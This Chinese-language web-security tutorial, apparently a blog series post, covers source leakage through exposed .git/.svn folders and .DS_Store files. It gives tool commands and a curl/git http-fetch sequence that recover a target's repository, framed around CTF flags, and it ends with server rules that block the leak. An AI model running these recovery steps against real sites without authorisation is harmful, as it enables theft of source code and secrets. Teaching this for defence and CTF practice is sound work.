iT邦幫忙

第 11 屆 iThome 鐵人賽

DAY 6
3
Security

Web Security 魔法使攻略系列 第 6

Web Security 魔法使攻略─魔法工程師的小祕密

  • 分享至 

  • xImage
  •  

正文

有些工程師開發網站的時候沒有注意到自己把敏感資料一起放在網路上了,
今天來看看這些「不小心」吧!

版本控制的敏感資訊洩漏

如果公司有進行版本控制系統如 git , svn
這時候要小心有沒有把 .git 或 .svn 一起部屬在線上環境上

使用我們神奇小工具─scrabble,GitHack
這兩個工具都可以幫助我們復原 .git 資料夾

scrabbble 使用方式
scrabble http://<目標 IP 或網站>/

GitHack 使用方式
GitHack.py http://<目標 IP 或網站>/.git/

curl http://<目標 IP 或網站>/.git/
curl http://<目標 IP 或網站>/.git/HEAD
curl http://<目標 IP 或網站>/.git/refs/heads/master
# 53eb21e4b8098bdf094374983b5a35b7213383e0
git init
git http-fetch -a  53eb21e4b8098bdf094374983b5a35b7213383e0 http://<目標IP>/.git/
ls -la
git checkout 53eb21e4b8098bdf094374983b5a35b7213383e0
ls -lat
# 查看內容
git log
git log -p
# you got flag!

取回原始碼會怎麼樣?

  • 壞人會查看你的原始碼,然後再攻擊你。
  • CTF 題目,可能會把 Flag 才在歷史紀錄裡面。

蘋果系統的敏感資訊洩漏─.DS_Store

  • 這是蘋果系統的隱藏檔案
  • 裡面可能會有目錄資訊
  • MacOs 會在所有資料夾,建立 .DS_Store
    使用我們神奇小工具─ds_store_exp

小建議

cd /var/www/ #任何你放 web 資料的地方
find . -type f -iname "*.DS_Store*"
  • Apache 放在 httpd.conf
<Files ~ "\.DS_Store$">
    Order allow,deny
    Deny from all
</Files>
  • Nginx 設定檔可以放
location ~ \.DS_Store$ {
      deny all;
}

上一篇
Web Security 魔法使攻略─魔法少女的利器
下一篇
Web Security 魔法使攻略─PHP 是世界上最好的語言
系列文
Web Security 魔法使攻略30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言